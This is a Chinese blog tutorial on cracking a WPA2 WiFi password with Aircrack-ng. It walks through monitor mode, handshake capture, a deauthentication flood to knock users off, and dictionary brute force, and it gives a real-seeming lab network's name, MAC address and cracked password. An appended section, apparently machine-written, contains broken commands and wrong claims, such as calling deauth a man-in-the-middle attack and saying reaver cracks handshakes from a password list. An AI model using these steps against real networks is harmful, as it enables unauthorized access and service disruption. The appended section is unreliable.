Aircrack-ng实现WiFi暴力破解

Aircrack-ng是无线渗透测试的经典工具,它是一款基于破解无线802.11协议的WEP以及WPA-PSK加密的工具。
主要功能有:
• 监控:数据包捕获和导出数据到文本文件,以供第三方工具进一步处理。
• 攻击:通过数据包注入回放攻击,去认证,伪造接入点等。
• 测试:检查WiFi卡和驱动程序的能力(捕捉和注入)。
• 破解:WEP 和 WPA PSK(WPA 1和2)。

参数:
BSSID:无线的mac地址
SSID:局域网的名称
PWR:网卡报告的信号水平(这个值越小信号越好)
Beacons:无线发出的通告编号
CH:AP使用的信道(从Beacons中获取)
MB:无线所支持的最大速率
ENC:加密方式
-c 指定选择的频道
-w 指定一个文件名,用于保存捕获的数据
–bssid 指定攻击的Bssid

步骤
1.连接网卡
在这里插入图片描述在这里插入图片描述

2.检查网卡是否支持监听
命令:airmon-ng
在这里插入图片描述

从图中可以看到我的无线网卡wlan0是支持监听模式的。如果该命令没有任何输出则表示没有可以支持监听模式的网卡。
3.开启无线网卡的监听模式
命令:airmon-ng start wlan0
在这里插入图片描述

可再经过ifconfig命令,查看监听模式是否开启成功。此时成功开启监听,网卡名称变成了wlan0mon
在这里插入图片描述

  1. 扫描监听热点,确定要攻击的WiFi
    命令:airodump-ng wlan0mon
    使用airodump-ng 命令列出无线网卡扫描到的WiFi热点详细信息,包括信号强度,加密类型,信道等。这里我们记下要破解WiFi的BSSID和信道。Ctrl+C 可以停止搜索
    在这里插入图片描述

可以看到,最右侧的ESSID,下面是周边WiFi的名字,最左侧的BSSID是这些WiFi对应的mac地址。ENC是加密方式,可以看到都是WPA2的(忽略校园网)。有的也会有WPA和WEP,但是这两个安全性都不如WPA2。CH是信道。
我们要破解图中的bamboo,这个是学校107实验室的WiFi。可以看到它的mac地址是78:44:FD:2A:45:FC

  1. 抓取握手包
    命令:airodump-ng -c <信道> --bssid <BSSID路由ID> -w <存储抓包的目录名称> <网卡名称>
    在这里插入图片描述

使用网卡监听模式抓取握手包,当有人连接此WiFi时就会出现WPA handshake:MAC地址,代表握手包抓取成功
当然如果没人能去连接此WiFi可以使用洪水攻击,强制打掉用户,使其重连
命令:aireplay-ng -0 0 -a <BSSID路由ID> -c <链接WiFi的mac IP> <网卡名>
6.密码字典爆破
命令:aircrack-ng -w 密码本路径 握手包路径
在这里插入图片描述

最终破解出bamboo密码hacker233

Aircrack-ng是一款著名的无线网络嗅探和破解工具,适用于Linux系统,特别是基于Unix的环境,如Ubuntu、Debian等。Windows用户通常需要通过安装兼容的模拟器,如Cygwin或VMware等,才能运行Aircrack-ng。 如果你想在Windows上利用类似工具进行Wi-Fi攻击,你可以按照以下步骤操作: 1. **设置开发环境**: - 安装虚拟机软件(如VirtualBox或VMware),创建一个新的Linux虚拟机,并安装必要的软件包,比如Debian或Kali Linux(一个专门用于安全评估的发行版)。 2. **安装Aircrack-ng**: - 在虚拟机里,打开终端,使用包管理器如apt-get或aptitude安装aircrack-ng和其他依赖包: ```bash sudo apt-get update sudo apt-get install aircrack-ng wireless-tools ``` 3. **捕获Wi-Fi信号**: 使用`aireplay-ng`命令发起一个“中间人”(Man-in-the-Middle,MITM)攻击,对目标网络进行监听。例如,如果你想要干扰或窃听网络`network01`,可以输入: ```bash aireplay-ng --deauth network01 ``` 4. **获取密码**: - 如果你已经捕获到了足够多的网络数据包(包含WPA/WPA2握手信息),你可以使用`reaver`或其他类似的工具尝试破解Wi-Fi密码,比如: ```bash reaver -i mon0 -b SSID --channel 6 --ap MacAddress --pwd-list /path/to/passwords.txt ``` 其中,SSID替换为你要破解的网络名称,MacAddress替换为目标接入点的MAC地址,passwords.txt是包含预设密码的文件。 请注意,这种操作非法并侵犯他人隐私,应在受法律允许的环境下学习和测试网络安全技术。在实际应用中,请遵守所有相关的法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值